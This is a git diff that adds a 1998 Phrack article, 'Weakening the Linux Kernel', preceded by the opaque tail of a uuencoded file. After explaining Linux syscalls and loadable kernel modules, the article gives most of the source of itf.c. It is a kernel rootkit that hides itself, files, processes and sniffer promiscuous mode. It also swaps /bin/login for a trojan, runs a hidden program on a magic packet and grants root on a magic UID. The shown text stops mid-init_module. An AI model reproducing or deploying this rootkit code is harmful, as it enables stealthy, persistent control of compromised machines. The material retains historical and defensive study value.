+MU3<.*?^3_KY:LVS+K\PZ!&?D_&^8R?,_;=FYD`MJLSEM#B)D7YG-T<8\S__4
+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
+%]0`@`P`Q
+`
+end
+<-->
+----[  EOF
diff --git a/phrack52/18.txt b/phrack52/18.txt
new file mode 100644
index 0000000..69e855d
--- /dev/null
+++ b/phrack52/18.txt
@@ -0,0 +1,952 @@
+---[  Phrack Magazine   Volume 8, Issue 52 January 26, 1998, article 18 of 20
+
+
+-------------------------[  Weakening the Linux Kernel
+
+
+--------[  plaguez <dube0866@eurobretagne.fr>
+
+
+
+
+----[  Preamble
+
+
+The following applies to the Linux x86 2.0.x kernel series.  It may also be
+accurate for previous releases, but has not been tested.  2.1.x kernels
+introduced a bunch of changes, most notably in the memory management routines,
+and are not discussed here.
+
+Thanks to Halflife and Solar Designer for lots of neat ideas.  Brought to you
+by plaguez and WSD.
+
+
+----[  User space vs. Kernel space
+
+Linux supports a number of architectures, however most of the code and
+discussion in this article refers to the i386 version only.
+
+Memory is divided into two parts: kernel space and user space. Kernel space
+is defined in the GDT, and mapped to each processes address space. User
+space is in the LDT and is local to each process. A given program can't
+write to kernel memory even when it is mapped because it is not in the
+same ring.
+
+You also can not access user memory from the kernel typically. However,
+this is really easy to overcome. When we execute a system call, one
+of the first things the kernel does is set ds and es up so that memory
+references point to the kernel data segment. It then sets up fs so that
+it points to the user data segment. If we want to use kernel memory
+in a system call, all we should have to do is push fs, then set it to ds.
+Of course, I have not actually tested this, so take it with a pound or
+two of salt :).
+
+Here are a few of the useful functions to use in kernel mode for transferring
+data bytes to or from user memory:
+
+#include <asm/segment.h>
+
+get_user(ptr)
+    Gets the given byte, word, or long from user memory.  This is a macro, and
+    it relies on the type of the argument to determine the number of bytes to
+    transfer.  You then have to use typecasts wisely.
+ 
+put_user(ptr)
+    This is the same as get_user(), but instead of reading, it writes data
+    bytes to user memory.
+ 
+memcpy_fromfs(void *to, const void *from,unsigned long n)
+    Copies n bytes from *from in user memory to *to in kernel memory.
+ 
+memcpy_tofs(void *to,const *from,unsigned long n)
+    Copies n bytes from *from in kernel memory to *to in user memory.
+
+
+----[  System calls
+
+
+Most libc function calls rely on underlying system calls, which are the
+simplest kernel functions a user program can call.  These system calls are
+implemented in the kernel itself or in loadable kernel modules, which are
+little chunks of dynamically linkable kernel code.
+
+Like MS-DOS and many others, Linux system calls are implemented through a
+multiplexor called with a given maskable interrupt.  In Linux, this interrupt
+is int 0x80.  When the 'int 0x80' instruction is executed, control is given to
+the kernel (or, more accurately, to the function _system_call()), and the
+actual demultiplexing process occurs.
+
+The _system_call() function works as follows:
+
+First, all registers are saved and the content of the %eax register is checked
+against the global system calls table, which enumerates all system calls and
+their addresses.  This table can be accessed with the extern void
+*sys_call_table[] variable.  A given number and memory address in this table
+corresponds to each system call.  System call numbers can be found in
+/usr/include/sys/syscall.h.  They are of the form SYS_systemcallname.  If the
+system call is not implemented, the corresponding cell in the sys_call_table
+is 0, and an error is returned.  Otherwise, the system call exists and the
+corresponding entry in the table is the memory address of the system call code.
+
+Here is an example of an invalid system call:
+
+[root@plaguez kernel]# cat no1.c
+#include <linux/errno.h>
+#include <sys/syscall.h>
+#include <errno.h>
+
+extern void *sys_call_table[];
+
+sc()
+{ // system call number 165 doesn't exist at this time.
+    __asm__(
+	    "movl $165,%eax
+             int $0x80");
+}
+
+main()
+{
+    errno = -sc();
+    perror("test of invalid syscall");
+}
+[root@plaguez kernel]# gcc no1.c
+[root@plaguez kernel]# ./a.out
+test of invalid syscall: Function not implemented
+[root@plaguez kernel]# exit
+
+
+Normally, control is then transferred to the actual system call, which performs
+whatever you requested and returns.  _system_call() then calls
+_ret_from_sys_call() to check various stuff, and ultimately returns to user
+memory.
+
+
+----[  libc wrappers
+
+The int $0x80 isn't used directly for system calls; rather, libc functions,
+which are often wrappers to interrupt 0x80, are used.
+
+libc is actually the user space interface to kernel functions.
+
+libc generally features the system calls using the _syscallX() macros, where X
+is the number of parameters for the system call.
+
+For example, the libc entry for write(2) would be implemented with a _syscall3
+macro, since the actual write(2) prototype requires 3 parameters.  Before
+calling interrupt 0x80, the _syscallX macros are supposed to set up the stack
+frame and the argument list required for the system call.  Finally, when the
+_system_call() (which is triggered with int $0x80) returns, the _syscallX()
+macro will check for a negative return value (in %eax) and will set errno
+accordingly.
+
+Let's check another example with write(2) and see how it gets preprocessed. 
+
+[root@plaguez kernel]# cat no2.c
+#include <linux/types.h>
+#include <linux/fs.h>
+#include <sys/syscall.h>
+#include <asm/unistd.h>
+#include <sys/types.h>
+#include <stdio.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <ctype.h>
+
+_syscall3(ssize_t,write,int,fd,const void *,buf,size_t,count);
+
+main()
+{
+    char *t = "this is a test.\n";
+    write(0, t, strlen(t));
+}
+[root@plaguez kernel]# gcc -E no2.c > no2.C
+[root@plaguez kernel]# indent no2.C -kr
+indent:no2.C:3304: Warning: old style assignment ambiguity in "=-".
+Assuming "= -"
+
+[root@plaguez kernel]# tail -n 50 no2.C
+
+
+#9 "no2.c" 2
+
+
+
+
+ssize_t write(int fd, const void *buf, size_t count)
+{
+    long __res;
+    __asm__ __volatile("int $0x80":"=a"(__res):"0"(4), "b"((long) (fd)), 
+"c"((long) (buf)), "d"((long) (count)));
+    if (__res >= 0)
+	return (ssize_t) __res;
+    errno = -__res;
+    return -1;
+};
+
+main()
+{
+    char *t = "this is a test.\n";
+    write(0, t, strlen(t));
+}
+[root@plaguez kernel]# exit
+
+
+
+Note that the '4' in the write() function above matches the SYS_write
+definition in /usr/include/sys/syscall.h. 
+
+
+----[  Writing your own system calls.
+
+There are a few ways to create your own system calls.  For example, you could
+modify the kernel sources and append your own code.  A far easier way, however,
+would be to write a loadable kernel module.
+
+A loadable kernel module is nothing more than an object file containing code
+that will be dynamically linked into the kernel when it is needed.
+
+The main purposes of this feature are to have a small kernel, and to load a
+given driver when it is needed with the insmod(1) command.  It's also easier
+to write a lkm than to write code in the kernel source tree.
+
+With lkm, adding  or modifying system calls is just a matter of modifying the
+sys_call_table array, as we'll see in the example below.
+
+
+----[  Writing a lkm
+
+
+A lkm is easily written in C.  It contains a chunk of #defines, the body of the
+code, an initialization function called init_module(), and an unload function
+called cleanup_module().  The init_module() and cleanup_module() functions
+will be called at module loading and deleting.  Also, don't forget that
+modules are kernel code, and though they are easy to write, any programming
+mistake can have quite serious results.
+
+Here is a typical lkm source structure:
+
+
+#define MODULE
+#define __KERNEL__
+
+#include <linux/config.h>
+#ifdef MODULE
+#include <linux/module.h>
+#include <linux/version.h>
+#else
+#define MOD_INC_USE_COUNT
+#define MOD_DEC_USE_COUNT
+#endif
+
+#include <linux/types.h>
+#include <linux/fs.h>
+#include <linux/mm.h>
+#include <linux/errno.h>
+#include <asm/segment.h>
+#include <sys/syscall.h>
+#include <linux/dirent.h>
+#include <asm/unistd.h>
+#include <sys/types.h>
+#include <stdio.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <ctype.h>
+
+int errno;
+
+char tmp[64];
+
+/* for example, we may need to use ioctl */
+_syscall3(int, ioctl, int, d, int, request, unsigned long, arg);
+
+int myfunction(int parm1,char *parm2)
+{
+   int i,j,k;
+   /* ... */
+}
+
+int init_module(void)
+{
+   /* ... */
+   printk("\nModule loaded.\n");
+   return 0;
+}
+
+void cleanup_module(void)
+{
+   /* ... */
+   printk("\nModule unloaded.\n");
+}
+
+Check the mandatory #defines (#define MODULE, #define __KERNEL__) and
+#includes (#include <linux/config.h> ...)
+
+Also note that as our lkm will be running in kernel mode, we can't use libc
+functions, but we can use system calls with the previously discussed
+_syscallX() macros or call them directly using the pointers to functions
+located in the sys_call_table array.
+
+You would compile this module with 'gcc -c -O3 module.c' and insert it into
+the kernel with 'insmod module.o' (optimization must be turned on).
+
+As the title suggests, lkm can also be used to modify kernel code without
+having to rebuild it entirely.  For example, you could patch the write(2)
+system call to hide portions of a given file.  Seems like a good place for
+backdoors, also: what would you do if you couldn't trust your own kernel?
+
+
+----[  Kernel and system calls backdoors
+
+
+The main idea behind this is pretty simple.  We'll redirect those damn system
+calls to our own system calls in a lkm, which will enable us to force the
+kernel to react as we want it to.  For example, we could hide a sniffer by
+patching the IOCTL system call and masking the PROMISC bit.  Lame but
+efficient.
+
+To modify a given system call, just add the definition of the extern void
+*sys_call_table[] in your lkm, and have the init_module() function modify the
+corresponding entry in the sys_call_table to point to your own code.  The
+modified call can then do whatever you wish it to, meaning that as all user
+programs rely on those kernel calls, you'll have entire control of the system.
+
+This point raises the fact that it can become very difficult to prevent
+intruders from staying in the system when they've broken into it.  Prevention
+is still the best way to security, and hardening the Linux kernel is needed on
+sensitive boxes.
+
+
+----[  A few programming tricks
+
+
+- Calling system calls within a lkm is pretty easy as long as you pass user
+space arguments to the given system call. If you need to pass kernel space
+arguments, you need to be sure to modify the fs register, or else
+everything will fall on its face.  It is just a matter of storing the
+system call function in a "pointer to function" variable, and then using this
+variable.  For example:
+
+#define MODULE
+#define __KERNEL__
+
+#include <linux/config.h>
+#ifdef MODULE
+#include <linux/module.h>
+#include <linux/version.h>
+#else
+#define MOD_INC_USE_COUNT
+#define MOD_DEC_USE_COUNT
+#endif
+
+#include <linux/types.h>
+#include <linux/fs.h>
+#include <linux/mm.h>
+#include <linux/errno.h>
+#include <asm/segment.h>
+#include <sys/syscall.h>
+
+#include <unistd.h>
+#include <linux/unistd.h>
+
+
+int errno;
+
+/* pointer to the old setreuid system call */
+int (*o_setreuid) (uid_t, uid_t);
+/* the system calls vectors table */
+extern void *sys_call_table[];
+
+
+int n_setreuid(uid_t ruid, uid_t euid)
+{
+    printk("uid %i trying to seteuid to euid=%i", current->uid, euid);
+    return (*o_setreuid) (ruid, euid);
+}
+
+
+int init_module(void)
+{
+    o_setreuid = sys_call_table[SYS_setreuid];
+    sys_call_table[SYS_setreuid] = (void *) n_setreuid;
+    printk("swatch loaded.\n");
+    return 0;
+}
+
+void cleanup_module(void)
+{
+    sys_call_table[SYS_setreuid] = o_setreuid;
+    printk("\swatch unloaded.\n");
+}
+
+- Hiding a module can be done in several ways.  As Runar Jensen showed in
+Bugtraq, you could strip /proc/modules on the fly, when a program tries to
+read it.  Unfortunately, this is somewhat difficult to implement and, as it
+turns out, this is not a good solution since doing a
+'dd if=/proc/modules bs=1' would show the module.  We need to find another
+solution.  Solar Designer (and other nameless individuals) have a solution.
+Since the module info list is not exported from the kernel, there is no direct
+way to access it, except that this module info structure is used in
+sys_init_module(), which calls our init_module()!  Providing that gcc does not
+fuck up the registers before entering our init_module(), it is possible to get
+the register previously used for struct module *mp and then to get the address
+of one of the items of this structure (which is a circular list btw). So, our
+init_module() function will include something like that at its beginning:
+
+int init_module()
+{
+  register struct module *mp asm("%ebx");   // or whatever register it is in
+  *(char*)mp->name=0;
+  mp->size=0;
+  mp->ref=0;
+  ...
+}
+
+Since the kernel does not show modules with no name and no references (=kernel
+modules), our one won't be shown in /proc/modules.
+
+
+----[  A practical example
+
+
+Here is itf.c.  The goal of this program is to demonstrate kernel backdooring
+techniques using system call redirection.  Once installed, it is very hard to
+spot.
+
+Its features include:
+
+- stealth functions:  once insmod'ed, itf will modify struct module *mp and
+get_kernel_symbols(2) so it won't appear in /proc/modules or ksyms' outputs.
+Also, the module cannot be unloaded.
+
+- sniffer hidder: itf will backdoor ioctl(2) so that the PROMISC flag will be
+hidden.  Note that you'll need to place the sniffer BEFORE insmod'ing itf.o,
+because itf will trap a change in the PROMISC flag and will then stop hidding
+it (otherwise you'd just have to do a ifconfig eth0 +promisc and you'd spot
+the module...).
+
+- file hidder: itf will also patch the getdents(2) system calls, thus hidding
+files containing a certain word in their filename.
+
+- process hidder: using the same technic as described above, itf will hide
+/procs/PD directories using argv entries.  Any process named with the magic
+name will be hidden from the procfs tree.
+
+- execve redirection: this implements Halflife's idea discussed in P51.
+If a given program (notably /bin/login) is execve'd, itf will execve
+another program instead.  It uses tricks to overcome Linux memory managment
+limitations: brk(2) is used to increase the calling program's data segment
+size, thus allowing us to allocate user memory while in kernel mode (remember
+that most system calls wait for arguments in user memory, not kernel mem).
+
+- socket recvfrom() backdoor: when a packet matching a given size and a given
+string is received, a non-interactive program will be executed.  Typicall use
+is a shell script (which will be hidden using the magic name) that opens
+another port and waits there for shell commands.
+
+- setuid() trojan: like Halflife's stuff.  When a setuid() syscall with uid ==
+magic number is done, the calling process will get uid = euid = gid = 0
+
+
+<++> lkm_trojan.c
+/*
+ * itf.c v0.8
+ * Linux Integrated Trojan Facility
+ * (c) plaguez 1997  --  dube0866@eurobretagne.fr
+ * This is mostly not fully tested code. Use at your own risks.
+ *
+ * 
+ * compile with:
+ *   gcc -c -O3 -fomit-frame-pointer itf.c
+ * Then:
+ *   insmod itf
+ * 
+ * 
+ * Thanks to Halflife and Solar Designer for their help/ideas. 
+ *
+ * Greets to: w00w00, GRP, #phrack, #innuendo, K2, YmanZ, Zemial.
+ *
+ * 
+ */
+
+#define MODULE
+#define __KERNEL__
+
+
+#include <linux/config.h>
+#include <linux/module.h>
+#include <linux/version.h>
+
+#include <linux/types.h>
+#include <linux/fs.h>
+#include <linux/mm.h>
+#include <linux/errno.h>
+#include <asm/segment.h>
+#include <asm/pgtable.h>
+#include <sys/syscall.h>
+#include <linux/dirent.h>
+#include <asm/unistd.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/socketcall.h>
+#include <linux/netdevice.h>
+#include <linux/if.h>
+#include <linux/if_arp.h>
+#include <linux/if_ether.h>
+#include <linux/proc_fs.h>
+#include <stdio.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <ctype.h>
+
+
+/* Customization section 
+ * - RECVEXEC is the full pathname of the program to be launched when a packet
+ * of size MAGICSIZE and containing the word MAGICNAME is received with recvfrom().
+ * This program can be a shell script, but must be able to handle null **argv (I'm too lazy
+ * to write more than execve(RECVEXEC,NULL,NULL); :)
+ * - NEWEXEC is the name of the program that is executed instead of OLDEXEC
+ * when an execve() syscall occurs.
+ * - MAGICUID is the numeric uid that will give you root when a call to setuid(MAGICUID)
+ * is made (like Halflife's code)
+ * - files containing MAGICNAME in their full pathname will be invisible to
+ * a getdents() system call.
+ * - processes containing MAGICNAME in their process name will be hidden of the
+ * procfs tree.
+ */
+#define MAGICNAME "w00w00T$!"
+#define MAGICUID  31337
+#define OLDEXEC   "/bin/login"
+#define NEWEXEC   "/.w00w00T$!/w00w00T$!login"
+#define RECVEXEC  "/.w00w00T$!/w00w00T$!recv"
+#define MAGICSIZE sizeof(MAGICNAME)+10
+
+/* old system calls vectors */
+int (*o_getdents) (uint, struct dirent *, uint);
+ssize_t(*o_readdir) (int, void *, size_t);
+int (*o_setuid) (uid_t);
+int (*o_execve) (const char *, const char *[], const char *[]);
+int (*o_ioctl) (int, int, unsigned long);
+int (*o_get_kernel_syms) (struct kernel_sym *);
+ssize_t(*o_read) (int, void *, size_t);
+int (*o_socketcall) (int, unsigned long *);
+/* entry points to brk() and fork() syscall. */
+static inline _syscall1(int, brk, void *, end_data_segment);
+static inline _syscall0(int, fork);
+static inline _syscall1(void, exit, int, status);
+
+extern void *sys_call_table[];
+extern struct proto tcp_prot;
+int errno;
+
+char mtroj[] = MAGICNAME;
+int __NR_myexecve;
+int promisc;
+
+
+
+/*
+ * String-oriented functions
+ * (from user-space to kernel-space or invert)
+ */
+
+char *strncpy_fromfs(char *dest, const char *src, int n)
+{
+    char *tmp = src;
+    int compt = 0;
+
+    do {
+	dest[compt++] = __get_user(tmp++, 1);
+    }
+    while ((dest[compt - 1] != '\0') && (compt != n));
+
+    return dest;
+}
+
+
+int myatoi(char *str)
+{
+    int res = 0;
+    int mul = 1;
+    char *ptr;
+
+    for (ptr = str + strlen(str) - 1; ptr >= str; ptr--) {
+	if (*ptr < '0' || *ptr > '9')
+	    return (-1);
+	res += (*ptr - '0') * mul;
+	mul *= 10;
+    }
+    return (res);
+}
+
+
+
+/*
+ * process hiding functions
+ */
+struct task_struct *get_task(pid_t pid)
+{
+    struct task_struct *p = current;
+    do {
+	if (p->pid == pid)
+	    return p;
+	p = p->next_task;
+    }
+    while (p != current);
+    return NULL;
+
+}
+
+/* the following function comes from fs/proc/array.c */
+static inline char *task_name(struct task_struct *p, char *buf)
+{
+    int i;
+    char *name;
+
+    name = p->comm;
+    i = sizeof(p->comm);
+    do {
+	unsigned char c = *name;
+	name++;
+	i--;
+	*buf = c;
+	if (!c)
+	    break;
+	if (c == '\\') {
+	    buf[1] = c;
+	    buf += 2;
+	    continue;
+	}
+	if (c == '\n') {
+	    buf[0] = '\\';
+	    buf[1] = 'n';
+	    buf += 2;
+	    continue;
+	}
+	buf++;
+    }
+    while (i);
+    *buf = '\n';
+    return buf + 1;
+}
+
+
+
+int invisible(pid_t pid)
+{
+    struct task_struct *task = get_task(pid);
+    char *buffer;
+    if (task) {
+	buffer = kmalloc(200, GFP_KERNEL);
+	memset(buffer, 0, 200);
+	task_name(task, buffer);
+	if (strstr(buffer, (char *) &mtroj)) {
+	    kfree(buffer);
+	    return 1;
+	}
+    }
+    return 0;
+}
+
+
+
+/*
+ * New system calls
+ */
+
+/*
+ * hide module symbols
+ */
+int n_get_kernel_syms(struct kernel_sym *table)
+{
+    struct kernel_sym *tb;
+    int compt, compt2, compt3, i, done;
+
+    compt = (*o_get_kernel_syms) (table);
+    if (table != NULL) {
+	tb = kmalloc(compt * sizeof(struct kernel_sym), GFP_KERNEL);
+	if (tb == 0) {
+	    return compt;
+	}
+	compt2 = 0;
+	done = 0;
+	i = 0;
+	memcpy_fromfs((void *) tb, (void *) table, compt * sizeof(struct kernel_sym));
+	while (!done) {
+	    if ((tb[compt2].name)[0] == '#')
+		i = compt2;
+	    if (!strcmp(tb[compt2].name, mtroj)) {
+		for (compt3 = i + 1; (tb[compt3].name)[0] != '#' && compt3 < compt; compt3++);
+		if (compt3 != (compt - 1))
+		    memmove((void *) &(tb[i]), (void *) &(tb[compt3]), (compt - compt3) * sizeof(struct kernel_sym));
+		else
+		    compt = i;
+		done++;
+	    }
+	    compt2++;
+	    if (compt2 == compt)
+		done++;
+
+	}
+
+	memcpy_tofs(table, tb, compt * sizeof(struct kernel_sym));
+	kfree(tb);
+    }
+    return compt;
+
+}
+
+
+
+/*
+ * how it works:
+ * I need to allocate user memory. To do that, I'll do exactly as malloc() does
+ * it (changing the break value).
+ */
+int my_execve(const char *filename, const char *argv[], const char *envp[])
+{
+    long __res;
+    __asm__ volatile ("int $0x80":"=a" (__res):"0"(__NR_myexecve), "b"((long) (filename)), "c"((long) (argv)), "d"((long) (envp)));
+    return (int) __res;
+}
+
+int n_execve(const char *filename, const char *argv[], const char *envp[])
+{
+    char *test;
+    int ret, tmp;
+    char *truc = OLDEXEC;
+    char *nouveau = NEWEXEC;
+    unsigned long mmm;
+
+    test = (char *) kmalloc(strlen(truc) + 2, GFP_KERNEL);
+    (void) strncpy_fromfs(test, filename, strlen(truc));
+    test[strlen(truc)] = '\0';
+    if (!strcmp(test, truc)) {
+	kfree(test);
+	mmm = current->mm->brk;
+	ret = brk((void *) (mmm + 256));
+	if (ret < 0)
+	    return ret;
+	memcpy_tofs((void *) (mmm + 2), nouveau, strlen(nouveau) + 1);
+	ret = my_execve((char *) (mmm + 2), argv, envp);
+	tmp = brk((void *) mmm);
+    } else {
+	kfree(test);
+	ret = my_execve(filename, argv, envp);
+    }
+    return ret;
+
+}
+
+
+/*
+ * Trap the ioctl() system call to hide PROMISC flag on ethernet interfaces.
+ * If we reset the PROMISC flag when the trojan is already running, then it
+ * won't hide it anymore (needed otherwise you'd just have to do an
+ * "ifconfig eth0 +promisc" to find the trojan).
+ */
+int n_ioctl(int d, int request, unsigned long arg)
+{
+    int tmp;
+    struct ifreq ifr;
+
+    tmp = (*o_ioctl) (d, request, arg);
+    if (request == SIOCGIFFLAGS && !promisc) {
+	memcpy_fromfs((struct ifreq *) &ifr, (struct ifreq *) arg, sizeof(struct ifreq));
+	ifr.ifr_flags = ifr.ifr_flags & (~IFF_PROMISC);
+	memcpy_tofs((struct ifreq *) arg, (struct ifreq *) &ifr, sizeof(struct ifreq));
+    } else if (request == SIOCSIFFLAGS) {
+	memcpy_fromfs((struct ifreq *) &ifr, (struct ifreq *) arg, sizeof(struct ifreq));
+	if (ifr.ifr_flags & IFF_PROMISC)
+	    promisc = 1;
+	else if (!(ifr.ifr_flags & IFF_PROMISC))
+	    promisc = 0;
+    }
+    return tmp;
+
+}
+
+
+/*
+ * trojan setMAGICUID() system call.
+ */
+int n_setuid(uid_t uid)
+{
+    int tmp;
+
+    if (uid == MAGICUID) {
+	current->uid = 0;
+	current->euid = 0;
+	current->gid = 0;
+	current->egid = 0;
+	return 0;
+    }
+    tmp = (*o_setuid) (uid);
+    return tmp;
+}
+
+
+/*
+ * trojan getdents() system call. 
+ */
+int n_getdents(unsigned int fd, struct dirent *dirp, unsigned int count)
+{
+    unsigned int tmp, n;
+    int t, proc = 0;
+    struct inode *dinode;
+    struct dirent *dirp2, *dirp3;
+
+    tmp = (*o_getdents) (fd, dirp, count);
+
+#ifdef __LINUX_DCACHE_H
+    dinode = current->files->fd[fd]->f_dentry->d_inode;
+#else
+    dinode = current->files->fd[fd]->f_inode;
+#endif
+
+    if (dinode->i_ino == PROC_ROOT_INO && !MAJOR(dinode->i_dev) && MINOR(dinode->i_dev) == 1)
+	proc = 1;
+    if (tmp > 0) {
+	dirp2 = (struct dirent *) kmalloc(tmp, GFP_KERNEL);
+	memcpy_fromfs(dirp2, dirp, tmp);
+	dirp3 = dirp2;
+	t = tmp;
+	while (t > 0) {
+	    n = dirp3->d_reclen;
+	    t -= n;
+	    if ((strstr((char *) &(dirp3->d_name), (char *) &mtroj) != NULL) \
+		||(proc && invisible(myatoi(dirp3->d_name)))) {
+		if (t != 0)
+		    memmove(dirp3, (char *) dirp3 + dirp3->d_reclen, t);
+		else
+		    dirp3->d_off = 1024;
+		tmp -= n;
+	    }
+	    if (dirp3->d_reclen == 0) {
+		/*
+		 * workaround for some shitty fs drivers that do not properly
+		 * feature the getdents syscall.
+		 */
+		tmp -= t;
+		t = 0;
+	    }
+	    if (t != 0)
+		dirp3 = (struct dirent *) ((char *) dirp3 + dirp3->d_reclen);
+
+
+	}
+	memcpy_tofs(dirp, dirp2, tmp);
+	kfree(dirp2);
+    }
+    return tmp;
+
+}
+
+
+/*
+ * Trojan socketcall system call
+ * executes a given binary when a packet containing the magic word is received.
+ * WARNING: THIS IS REALLY UNTESTED UGLY CODE. MAY CORRUPT YOUR SYSTEM.  
+ */
+
+int n_socketcall(int call, unsigned long *args)
+{
+    int ret, ret2, compt;
+    char *t = RECVEXEC;
+    unsigned long *sargs = args;
+    unsigned long a0, a1, mmm;
+    void *buf;
+
+    ret = (*o_socketcall) (call, args);
+    if (ret == MAGICSIZE && call == SYS_RECVFROM) {
+	a0 = get_user(sargs);
+	a1 = get_user(sargs + 1);
+	buf = kmalloc(ret, GFP_KERNEL);
+	memcpy_fromfs(buf, (void *) a1, ret);
+	for (compt = 0; compt < ret; compt++)
+	    if (((char *) (buf))[compt] == 0)
+		((char *) (buf))[compt] = 1;
+	if (strstr(buf, mtroj)) {
+	    kfree(buf);
+	    ret2 = fork();
+	    if (ret2 == 0) {
+		mmm = current->mm->brk;
+		ret2 = brk((void *) (mmm + 256));
+		memcpy_tofs((void *) mmm + 2, (void *) t, strlen(t) + 1);
+/* Hope the execve has been successfull otherwise you'll have 2 copies of the
+   master process in the ps list :] */
+		ret2 = my_execve((char *) mmm + 2, NULL, NULL);
+	    }
+	}
+    }
+    return ret;
+}
+
+
+
+
+
+/*
+ * module initialization stuff.
+ */
+int init_module(void)
+{
+/* module list cleaning */
+/* would need to make a clean search of the right register
+ * in the function prologue, since gcc may not always put 
+ * struct module *mp in %ebx 
+ * 
+ * Try %ebx, %edi, %ebp, well, every register actually :)
+ */
+    register struct module *mp asm("%ebx");
+    *(char *) (mp->name) = 0;
+    mp->size = 0;
+    mp->ref = 0;
+/*
+ * Make it unremovable
+ */
+/*    MOD_INC_USE_COUNT;
+ */
+    o_get_kernel_syms = sys_call_table[SYS_get_kernel_syms];
+    sys_call_table[SYS_get_kernel_syms] = (void *) n_get_kernel_syms;
+
+    o_getdents = sys_call_table[SYS_getdents];
+    sys_call_table[SYS_getdents] = (void *) n_getdents;
+
+    o_setuid = sys_call_table[SYS_setuid];
+    sys_call_table[SYS_setuid] = (void *) n_setuid;
+
+    __NR_myexecve = 164;
+    while (__NR_myexecve != 0 && sys_call_table[__NR_myexecve] != 0)
+	__NR_myexecve--;
+    o_execve = sys_call_table[SYS_execve];
+    if (__NR_myexecve != 0) {
+	sys_call_table[__NR_myexecve] = o_execve;
+	sys_call_table[SYS_execve] = (void *) n_execve;
+    }
+    promisc = 0;
+    o_ioctl = sys_call_table[SYS_ioctl];
+    sys_call_table[SYS_ioctl] = (void *) n_ioctl;
+
